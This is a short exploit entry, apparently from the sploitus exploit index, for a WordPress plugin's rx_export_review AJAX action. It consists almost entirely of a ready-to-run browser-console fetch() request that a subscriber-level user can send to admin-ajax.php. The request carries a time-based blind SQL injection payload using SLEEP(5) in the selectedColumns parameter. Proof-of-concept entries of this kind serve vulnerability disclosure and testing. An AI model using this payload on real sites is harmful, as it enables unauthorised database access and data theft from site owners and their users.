Share
## https://sploitus.com/exploit?id=WPEX-ID:BB5CC190-6291-4AF3-978B-0ADE2EA68D77
Run the below command in the developer console of the web browser while being on the blog as subscriber user

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": 'action=rx_export_review&filterValue[6]=&filterValue[7]=id&selectedColumns[]=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))a)',
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));